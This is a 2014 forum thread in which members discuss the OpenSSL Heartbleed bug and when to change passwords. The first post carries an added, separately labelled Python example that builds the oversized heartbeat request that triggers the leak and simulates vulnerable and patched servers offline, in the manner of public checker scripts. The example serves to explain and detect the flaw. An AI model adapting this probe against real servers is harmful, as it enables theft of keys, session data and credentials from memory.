Author Topic: "Heartbleed" SSL vulnerability


Offline Prob Lem

  • Posts: 571
"Heartbleed" SSL vulnerability
« on: April 10, 2014, 09:58:26 PM »
Just a quick heads-up in case this news has passed anyone by: There's been a vulnerability discovered in OpenSSL that makes it possible for eviltons and ne'er-do-wells to eavesdrop on connections that should be secure. There's a decent-enough summary of it on the BBC News website, here.

Depending on the services you use, you may want to hold off on changing all passwords immediately, though - if you do so with services which have not yet both patched their OpenSSL installations *and* re-generated their security certificates, it's a pointless exercise, as there may be a potential risk of this information being exposed if attackers hit that service, and you'll just need to do it all over again when they do patch and update their certificates.

There is a tool for checking whether servers are or were affected, and have or have not yet been fixed, and password-management services such as LastPass are providing updates on which passwords users do and don't need to deal with right now, from within their tools.
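The kind of server check the post mentions, as an added example that is not the tool referred to above and not code from this thread: it builds the heartbeat request the public Heartbleed checkers send (a request whose payload_length field claims far more bytes than were actually sent), simulates how an unpatched and a patched OpenSSL would answer it against a constructed stand-in for adjacent heap memory, and classifies the reply the way those checkers do. Nothing here touches the network; the TLS version, the heap contents and the "session=deadbeef" string are all constructed for the example.

```python
"""Heartbeat length check, in the style of the public Heartbleed test scripts.
Added example, not a tool from the original thread. All memory contents and
messages below are constructed in this file; nothing goes on the network."""
import struct

TLS_HEARTBEAT = 0x18       # TLS record content type for heartbeat (RFC 6520)
TLS_ALERT = 0x15
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16           # RFC 6520 requires at least 16 bytes of padding
TLS_VERSION = b"\x03\x02"  # TLS 1.1; constructed choice, any version works here


def _record(body: bytes) -> bytes:
    """Wrap a heartbeat fragment in a TLS record header."""
    return bytes([TLS_HEARTBEAT]) + TLS_VERSION + struct.pack("!H", len(body)) + body


def build_heartbeat_request(claimed_len: int, payload: bytes = b"") -> bytes:
    """Heartbeat request whose payload_length field (claimed_len) may exceed
    the bytes actually sent. That mismatch is the whole Heartbleed trigger."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return _record(body)


def parse_tls_records(data: bytes):
    """Split a byte stream into (content_type, version, fragment) tuples."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, version = data[off], data[off + 1:off + 3]
        length = struct.unpack("!H", data[off + 3:off + 5])[0]
        fragment = data[off + 5:off + 5 + length]
        if len(fragment) != length:
            break                              # truncated record, stop
        records.append((ctype, version, fragment))
        off += 5 + length
    return records


def vulnerable_server(record: bytes, process_memory: bytes) -> bytes:
    """Simulates the unpatched behaviour: trust payload_length and copy that
    many bytes starting at the payload, which in a real process runs on into
    whatever sits after the request buffer. process_memory is a constructed
    stand-in for that adjacent memory."""
    fragment = record[5:]
    payload_len = struct.unpack("!H", fragment[1:3])[0]
    buf = fragment[3:] + process_memory        # the request, then adjacent heap
    leaked = buf[:payload_len]                 # no check against len(fragment)
    return _record(struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * MIN_PADDING)


def patched_server(record: bytes, process_memory: bytes) -> bytes:
    """Simulates the fix: if 1 + 2 + payload_length + 16 exceeds the fragment
    length, silently discard the request (as RFC 6520 section 4 requires)."""
    fragment = record[5:]
    payload_len = struct.unpack("!H", fragment[1:3])[0]
    if 1 + 2 + payload_len + MIN_PADDING > len(fragment):
        return b""                             # dropped, no response at all
    payload = fragment[3:3 + payload_len]
    return _record(struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * MIN_PADDING)


def leaked_payload(response: bytes) -> bytes:
    """Payload bytes carried by the first heartbeat response in the stream."""
    for ctype, _version, fragment in parse_tls_records(response):
        if ctype == TLS_HEARTBEAT and fragment and fragment[0] == HB_RESPONSE:
            payload_len = struct.unpack("!H", fragment[1:3])[0]
            return fragment[3:3 + payload_len]
    return b""


def classify(response: bytes, bytes_sent: int) -> str:
    """What the checker scripts conclude from the server's reply, given how
    many payload bytes were actually sent."""
    for ctype, _version, fragment in parse_tls_records(response):
        if ctype == TLS_ALERT:
            return "not vulnerable (server sent an alert)"
        if ctype == TLS_HEARTBEAT and fragment and fragment[0] == HB_RESPONSE:
            if len(fragment) > 3 + bytes_sent + MIN_PADDING:
                return "VULNERABLE (server returned more than it was sent)"
            return "not vulnerable (response matched what was sent)"
    return "not vulnerable (no heartbeat response)"


def demo() -> dict:
    """Run the 16 KiB probe against both simulated servers."""
    heap = b"user=alice; session=deadbeef; " * 600   # constructed heap contents
    probe = build_heartbeat_request(claimed_len=0x4000)  # claims 16384, sends 0
    return {
        "unpatched": classify(vulnerable_server(probe, heap), 0),
        "patched": classify(patched_server(probe, heap), 0),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

A real probe first completes the TLS handshake up to ServerHelloDone and only then sends the heartbeat record; that exchange is left out here so the example runs offline. The verdict logic is the part worth understanding: the server is flagged only when the heartbeat response is longer than what the client actually sent, which is exactly the length check the patch added.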

Offline mobius

  • Posts: 2759
  • relax.
Re: "Heartbleed" SSL vulnerability
« Reply #1 on: April 10, 2014, 10:15:44 PM »
Thanks for your continual effort in pointing these things out  :thumbsup:

I heard about this. It might explain my plague of viruses last year...  :-\
everything by me: https://www.lemmingsforums.net/index.php?topic=5982.msg96035#msg96035

"Not knowing how near the truth is, we seek it far away."
-Hakuin Ekaku

"I have seen a heap of trouble in my life, and most of it has never come to pass" - Mark Twain


Offline Prob Lem

  • Posts: 571
Re: "Heartbleed" SSL vulnerability
« Reply #2 on: April 10, 2014, 10:35:20 PM »
Heh, no problem. :D I think it's important to post a heads-up, even when it's fairly likely everyone else already knows, just in case someone doesn't!

As far as viruses go, I'd say that's unlikely to be related to this - this one is (generally, unless you're for some reason running an SSL service on your home box) on the server side, so eviltons are much more likely to be targeting companies holding information that's of (or potentially of) financial value to them.